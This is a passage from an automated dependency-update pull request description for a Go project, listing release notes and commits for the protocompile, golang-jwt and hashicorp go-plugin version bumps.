href=\"https://github.com/brianvoe/gofakeit/commit/35520064411e85a403d4b41f22d3269604871e20\"\u003e\u003ccode\u003e3552006\u003c/code\u003e\u003c/a\u003e fix: guarantee at least one char per enabled set in Password()\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/brianvoe/gofakeit/compare/v7.14.0...v7.14.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/bufbuild/protocompile` from 0.4.0 to 0.14.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/bufbuild/protocompile/releases\"\u003egithub.com/bufbuild/protocompile's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.14.1\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003ch3\u003eBugfixes changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix bug where extension declarations marked as reserved would not allow the \u003ccode\u003efull_name\u003c/code\u003e or \u003ccode\u003etype\u003c/code\u003e fields to be specified. This failed to mirror the corresponding rule in the reference compiler \u003ccode\u003eprotoc\u003c/code\u003e, which allows them to be set for documentation purposes. Now these two fields can be used on reserved declarations as long as both are present. By \u003ca href=\"https://github.com/jhump\"\u003e\u003ccode\u003e@​jhump\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bufbuild/protocompile/issues/327\"\u003e#327\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix panic and error-reporting anomalies that can occur when interpreting options in lenient mode via calling either \u003ccode\u003eoptions.InterpretOptionsLenient\u003c/code\u003e or \u003ccode\u003eoptions.InterpretUnlinkedOptions\u003c/code\u003e. By \u003ca href=\"https://github.com/jhump\"\u003e\u003ccode\u003e@​jhump\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bufbuild/protocompile/issues/331\"\u003e#331\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/bufbuild/protocompile/compare/v0.14.0...v0.14.1\"\u003ehttps://github.com/bufbuild/protocompile/compare/v0.14.0...v0.14.1\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.14.0\u003c/h2\u003e\n\u003cp\u003eThis version makes Protobuf Editions available to users of this package, without needing to use a special opt-in that is documented as test-only. It contains one backwards-incompatible change, only for users that used that Editions opt-in: it has been removed since the functionality is now generally available.\u003c/p\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003ch3\u003eBugfixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eCorrectly handle groups in the \u003ccode\u003eTextName\u003c/code\u003e method of field descriptors created by the compiler in \u003ca href=\"https://redirect.github.com/bufbuild/protocompile/issues/297\"\u003e#297\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix bug in extension declarations: presence of a declaration implies the range is verified in \u003ca href=\"https://redirect.github.com/bufbuild/protocompile/issues/303\"\u003e#303\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix a typo in code that adapts/re-parses features to match a descriptor; addresses a bug in \u003ccode\u003eprotoutil.ResolveCustomFeature\u003c/code\u003e in \u003ca href=\"https://redirect.github.com/bufbuild/protocompile/issues/305\"\u003e#305\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd more thorough checks for when to adapt a value when resolving custom feature; addresses a deficiency in \u003ccode\u003eprotoutil.ResolveCustomFeature\u003c/code\u003e in \u003ca href=\"https://redirect.github.com/bufbuild/protocompile/issues/306\"\u003e#306\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eCorrectly handle maps in the \u003ccode\u003eKind\u003c/code\u003e method of field descriptors created by the compiler, in files that define a file-wide default of delimited encoding for messages in \u003ca href=\"https://redirect.github.com/bufbuild/protocompile/issues/312\"\u003e#312\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eEnhancements\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd \u003ccode\u003egoogle/protobuf/cpp_features.proto\u003c/code\u003e, \u003ccode\u003egoogle/protobuf/java_features.proto\u003c/code\u003e, and \u003ccode\u003egoogle/protobuf/go_features.proto\u003c/code\u003e to the set of files provided by \u003ccode\u003eprotocomile.WithStandardImports\u003c/code\u003e in \u003ca href=\"https://redirect.github.com/bufbuild/protocompile/issues/295\"\u003e#295\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd some final checks to mirror logic of protoc v27.0: files cannot use custom features defined in the same file, enforce \u0026quot;feature support\u0026quot; options, which define the editions in which a feature and/or feature value can be used in \u003ca href=\"https://redirect.github.com/bufbuild/protocompile/issues/301\"\u003e#301\u003c/a\u003e and \u003ca href=\"https://redirect.github.com/bufbuild/protocompile/issues/309\"\u003e#309\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eEnable support for Protobuf Editions. To start, this only supports edition 2023. Added in \u003ca href=\"https://redirect.github.com/bufbuild/protocompile/issues/301\"\u003e#301\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003eThis contains a \u003cstrong\u003ebackwards-incompatible\u003c/strong\u003e change: the \u003ccode\u003eeditionstesting.AllowEditions()\u003c/code\u003e function (which was documented as temporary when introduced in v0.10.0) has been removed.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003eAdd \u003ccode\u003ewellknownimports\u003c/code\u003e package, for providing actual source code for the standard imports (\u003ccode\u003ewellknownimports.WithStandardImports\u003c/code\u003e is an alternative to \u003ccode\u003eprotocompile.WithStandardImports\u003c/code\u003e) in \u003ca href=\"https://redirect.github.com/bufbuild/protocompile/issues/310\"\u003e#310\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eOther changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate linker tests to use \u003ccode\u003eprotodesc\u003c/code\u003e to create descriptors from compilation results, to verify compilation results can be correctly processed by protobuf-go runtime in \u003ca href=\"https://redirect.github.com/bufbuild/protocompile/issues/302\"\u003e#302\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd another (missing) test case for extension declarations in \u003ca href=\"https://redirect.github.com/bufbuild/protocompile/issues/304\"\u003e#304\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/bufbuild/protocompile/compare/v0.13.0...v0.14.0\"\u003ehttps://github.com/bufbuild/protocompile/compare/v0.13.0...v0.14.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.13.0\u003c/h2\u003e\n\u003cp\u003eThis release includes a single addition to the \u003ccode\u003eprotocompile.Compiler\u003c/code\u003e type.\u003c/p\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003ch3\u003eEnhancements\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eProvide ability for caller to seed/re-use symbol table across compile jobs by \u003ca href=\"https://github.com/jhump\"\u003e\u003ccode\u003e@​jhump\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bufbuild/protocompile/issues/294\"\u003e#294\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/bufbuild/protocompile/compare/v0.12.0...v0.13.0\"\u003ehttps://github.com/bufbuild/protocompile/compare/v0.12.0...v0.13.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.12.0\u003c/h2\u003e\n\u003cp\u003eThis release mostly contains performance improvements. It also includes an addition that makes it possible to implement a descriptor resolver on top of \u003ccode\u003elinker.Files\u003c/code\u003e much more efficiently, using a \u003ccode\u003e*linker.Symbols\u003c/code\u003e as an index.\u003c/p\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003ch3\u003eEnhancements\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd lookup methods to \u003ccode\u003e*linker.Symbols\u003c/code\u003e by \u003ca href=\"https://github.com/jhump\"\u003e\u003ccode\u003e@​jhump\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bufbuild/protocompile/issues/286\"\u003e#286\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eVarious performance improvements (mostly reducing allocations) in the linker by \u003ca href=\"https://github.com/jhump\"\u003e\u003ccode\u003e@​jhump\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bufbuild/protocompile/issues/286\"\u003e#286\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/bufbuild/protocompile/issues/287\"\u003e#287\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/bufbuild/protocompile/issues/290\"\u003e#290\u003c/a\u003e, and \u003ca href=\"https://redirect.github.com/bufbuild/protocompile/issues/291\"\u003e#291\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eOther changes\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bufbuild/protocompile/commit/4082cf0effa602efd1a38af1d586cfa8b56a7ae2\"\u003e\u003ccode\u003e4082cf0\u003c/code\u003e\u003c/a\u003e Bump github.com/golangci/golangci-lint from 1.60.0 to 1.60.1 in /internal/too...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bufbuild/protocompile/commit/6953ab0b4fca6df5f5a2791a23d05edd3667c2ff\"\u003e\u003ccode\u003e6953ab0\u003c/code\u003e\u003c/a\u003e Bump github.com/bufbuild/buf from 1.36.0 to 1.37.0 in /internal/tools (\u003ca href=\"https://redirect.github.com/bufbuild/protocompile/issues/332\"\u003e#332\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bufbuild/protocompile/commit/0142a0715e5fc3929c67a99e0a0534a4d11b4a8d\"\u003e\u003ccode\u003e0142a07\u003c/code\u003e\u003c/a\u003e Fix panic that can occur when interpreting options in lenient mode (\u003ca href=\"https://redirect.github.com/bufbuild/protocompile/issues/331\"\u003e#331\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bufbuild/protocompile/commit/0de629aa798dad864d819111004e9648128b15d9\"\u003e\u003ccode\u003e0de629a\u003c/code\u003e\u003c/a\u003e Update to go1.21 and golangci 1.60.0, test with go1.23 (\u003ca href=\"https://redirect.github.com/bufbuild/protocompile/issues/330\"\u003e#330\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bufbuild/protocompile/commit/245c11dc13a84705c8b26147086bb79cd01720d3\"\u003e\u003ccode\u003e245c11d\u003c/code\u003e\u003c/a\u003e Bump golang.org/x/tools from 0.23.0 to 0.24.0 in /internal/tools (\u003ca href=\"https://redirect.github.com/bufbuild/protocompile/issues/328\"\u003e#328\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bufbuild/protocompile/commit/8bd6667a27e36b7052d3e1622e9c68eac7487385\"\u003e\u003ccode\u003e8bd6667\u003c/code\u003e\u003c/a\u003e Bump github.com/bufbuild/buf from 1.35.1 to 1.36.0 in /internal/tools (\u003ca href=\"https://redirect.github.com/bufbuild/protocompile/issues/329\"\u003e#329\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bufbuild/protocompile/commit/1c0714018e4cbc9957dd0712941b10ee7095a8a8\"\u003e\u003ccode\u003e1c07140\u003c/code\u003e\u003c/a\u003e Allow reserved extension declaration to specify full_name and type as long as...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bufbuild/protocompile/commit/cab89429889f2a8697bcf70bf9470bd2d7ed9c81\"\u003e\u003ccode\u003ecab8942\u003c/code\u003e\u003c/a\u003e Bump golang.org/x/sync from 0.7.0 to 0.8.0 in /internal/benchmarks (\u003ca href=\"https://redirect.github.com/bufbuild/protocompile/issues/326\"\u003e#326\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bufbuild/protocompile/commit/66f98f35c033bb5616b217515cb72562d3a3851a\"\u003e\u003ccode\u003e66f98f3\u003c/code\u003e\u003c/a\u003e Bump golang.org/x/sync from 0.7.0 to 0.8.0 (\u003ca href=\"https://redirect.github.com/bufbuild/protocompile/issues/325\"\u003e#325\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bufbuild/protocompile/commit/00a0cbd6a0d9c43e16a7c20ea0bac515a0269e9e\"\u003e\u003ccode\u003e00a0cbd\u003c/code\u003e\u003c/a\u003e Bump github.com/bufbuild/buf from 1.34.0 to 1.35.1 in /internal/tools (\u003ca href=\"https://redirect.github.com/bufbuild/protocompile/issues/324\"\u003e#324\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/bufbuild/protocompile/compare/v0.4.0...v0.14.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/golang-jwt/jwt/v5` from 5.3.0 to 5.3.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/golang-jwt/jwt/releases\"\u003egithub.com/golang-jwt/jwt/v5's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.3.1\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003ch3\u003e🔐 Features\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd spellcheck Github action to catch common spelling mistakes by \u003ca href=\"https://github.com/equalsgibson\"\u003e\u003ccode\u003e@​equalsgibson\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/458\"\u003egolang-jwt/jwt#458\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd \u003ccode\u003eWithNotBeforeRequired\u003c/code\u003e parser option and add test coverage by \u003ca href=\"https://github.com/equalsgibson\"\u003e\u003ccode\u003e@​equalsgibson\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/456\"\u003egolang-jwt/jwt#456\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate godoc example func to properly refer to \u003ccode\u003eNewWithClaims()\u003c/code\u003e by \u003ca href=\"https://github.com/equalsgibson\"\u003e\u003ccode\u003e@​equalsgibson\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/459\"\u003egolang-jwt/jwt#459\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate github workflows by \u003ca href=\"https://github.com/mfridman\"\u003e\u003ccode\u003e@​mfridman\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/462\"\u003egolang-jwt/jwt#462\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdditional test for CustomClaims that validates unmarshalling behaviour by \u003ca href=\"https://github.com/equalsgibson\"\u003e\u003ccode\u003e@​equalsgibson\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/457\"\u003egolang-jwt/jwt#457\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix early file close in jwt cli by \u003ca href=\"https://github.com/mfridman\"\u003e\u003ccode\u003e@​mfridman\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/472\"\u003egolang-jwt/jwt#472\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd TPM signature reference by \u003ca href=\"https://github.com/salrashid123\"\u003e\u003ccode\u003e@​salrashid123\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/473\"\u003egolang-jwt/jwt#473\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRemove misleading ParserOptions documentation in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/484\"\u003egolang-jwt/jwt#484\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSave signature to Token struct after successful signing by \u003ca href=\"https://github.com/EgorSheff\"\u003e\u003ccode\u003e@​EgorSheff\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/417\"\u003egolang-jwt/jwt#417\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSet token.Signature in \u003ccode\u003eParseUnverified\u003c/code\u003e by \u003ca href=\"https://github.com/slickwilli\"\u003e\u003ccode\u003e@​slickwilli\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/414\"\u003egolang-jwt/jwt#414\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e👒 Dependencies\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBump crate-ci/typos from 1.34.0 to 1.35.3 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/461\"\u003egolang-jwt/jwt#461\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump crate-ci/typos from 1.35.4 to 1.36.2 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/470\"\u003egolang-jwt/jwt#470\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump github/codeql-action from 3 to 4 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/478\"\u003egolang-jwt/jwt#478\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump crate-ci/typos from 1.36.2 to 1.39.0 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/480\"\u003egolang-jwt/jwt#480\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump golangci/golangci-lint-action from 8 to 9 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/481\"\u003egolang-jwt/jwt#481\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump actions/setup-go from 5 to 6 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/469\"\u003egolang-jwt/jwt#469\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump crate-ci/typos from 1.39.0 to 1.40.0 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/488\"\u003egolang-jwt/jwt#488\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump actions/checkout from 5 to 6 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/487\"\u003egolang-jwt/jwt#487\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump crate-ci/typos from 1.40.0 to 1.41.0 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/490\"\u003egolang-jwt/jwt#490\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump crate-ci/typos from 1.41.0 to 1.42.1 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/492\"\u003egolang-jwt/jwt#492\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/equalsgibson\"\u003e\u003ccode\u003e@​equalsgibson\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/458\"\u003egolang-jwt/jwt#458\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/salrashid123\"\u003e\u003ccode\u003e@​salrashid123\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/473\"\u003egolang-jwt/jwt#473\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/EgorSheff\"\u003e\u003ccode\u003e@​EgorSheff\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/417\"\u003egolang-jwt/jwt#417\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/slickwilli\"\u003e\u003ccode\u003e@​slickwilli\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/414\"\u003egolang-jwt/jwt#414\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/golang-jwt/jwt/compare/v5.3.0...v5.3.1\"\u003ehttps://github.com/golang-jwt/jwt/compare/v5.3.0...v5.3.1\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang-jwt/jwt/commit/7ceae619e739dc8a7bf577214aa8ebf26668e9db\"\u003e\u003ccode\u003e7ceae61\u003c/code\u003e\u003c/a\u003e Add release.yml for changelog configuration\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang-jwt/jwt/commit/dce8e4dddcc9dc812cdc0b9d2037512d0e4b3eb5\"\u003e\u003ccode\u003edce8e4d\u003c/code\u003e\u003c/a\u003e Set token.Signature in \u003ccode\u003eParseUnverified\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/golang-jwt/jwt/issues/414\"\u003e#414\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang-jwt/jwt/commit/8889e208aa5c3736e5f7a856107ee70c046b803e\"\u003e\u003ccode\u003e8889e20\u003c/code\u003e\u003c/a\u003e Save signature to Token struct after successful signing (\u003ca href=\"https://redirect.github.com/golang-jwt/jwt/issues/417\"\u003e#417\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang-jwt/jwt/commit/d237f8204b397bc008b5b07c4e081beb4ec2a7b1\"\u003e\u003ccode\u003ed237f82\u003c/code\u003e\u003c/a\u003e ci: update github-actions schedule interval to monthly\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang-jwt/jwt/commit/d8dce95a406fc435aa3d11c5073f2f31a9449116\"\u003e\u003ccode\u003ed8dce95\u003c/code\u003e\u003c/a\u003e Bump crate-ci/typos from 1.41.0 to 1.42.1 (\u003ca href=\"https://redirect.github.com/golang-jwt/jwt/issues/492\"\u003e#492\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang-jwt/jwt/commit/e93180329eab078116176ff7dc4352760bc5f290\"\u003e\u003ccode\u003ee931803\u003c/code\u003e\u003c/a\u003e Bump crate-ci/typos from 1.40.0 to 1.41.0 (\u003ca href=\"https://redirect.github.com/golang-jwt/jwt/issues/490\"\u003e#490\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang-jwt/jwt/commit/e6a0afa839d74787501369217245b52bfc75f30d\"\u003e\u003ccode\u003ee6a0afa\u003c/code\u003e\u003c/a\u003e Bump actions/checkout from 5 to 6 (\u003ca href=\"https://redirect.github.com/golang-jwt/jwt/issues/487\"\u003e#487\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang-jwt/jwt/commit/9f85c9ec9f10fb6919d773cb8df07029639ec76e\"\u003e\u003ccode\u003e9f85c9e\u003c/code\u003e\u003c/a\u003e Bump crate-ci/typos from 1.39.0 to 1.40.0 (\u003ca href=\"https://redirect.github.com/golang-jwt/jwt/issues/488\"\u003e#488\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang-jwt/jwt/commit/60a8669e0221aed55a6abfd9b5cd20472f0c6ebd\"\u003e\u003ccode\u003e60a8669\u003c/code\u003e\u003c/a\u003e Bump actions/setup-go from 5 to 6 (\u003ca href=\"https://redirect.github.com/golang-jwt/jwt/issues/469\"\u003e#469\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang-jwt/jwt/commit/76f582896da76978896d59ced995d7967c33c434\"\u003e\u003ccode\u003e76f5828\u003c/code\u003e\u003c/a\u003e Remove misleading ParserOptions documentation (\u003ca href=\"https://redirect.github.com/golang-jwt/jwt/issues/484\"\u003e#484\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/golang-jwt/jwt/compare/v5.3.0...v5.3.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/hashicorp/go-plugin` from 1.6.3 to 1.7.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/hashicorp/go-plugin/releases\"\u003egithub.com/hashicorp/go-plugin's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.7.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003ePrint panic output on Error log level by \u003ca href=\"https://github.com/hanzei\"\u003e\u003ccode\u003e@​hanzei\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/292\"\u003ehashicorp/go-plugin#292\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSpend less time preparing to write log lines when the logger is disabled by \u003ca href=\"https://github.com/apparentlymart\"\u003e\u003ccode\u003e@​apparentlymart\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/352\"\u003ehashicorp/go-plugin#352\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eComplete the implementation of moving panics to the Error log level by \u003ca href=\"https://github.com/jbardin\"\u003e\u003ccode\u003e@​jbardin\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/353\"\u003ehashicorp/go-plugin#353\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eupdate changelog for v1.7.0 by \u003ca href=\"https://github.com/jbardin\"\u003e\u003ccode\u003e@​jbardin\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/356\"\u003ehashicorp/go-plugin#356\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/KaushikiAnand\"\u003e\u003ccode\u003e@​KaushikiAnand\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/335\"\u003ehashicorp/go-plugin#335\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/hanzei\"\u003e\u003ccode\u003e@​hanzei\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/292\"\u003ehashicorp/go-plugin#292\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/dduzgun-security\"\u003e\u003ccode\u003e@​dduzgun-security\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/337\"\u003ehashicorp/go-plugin#337\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca 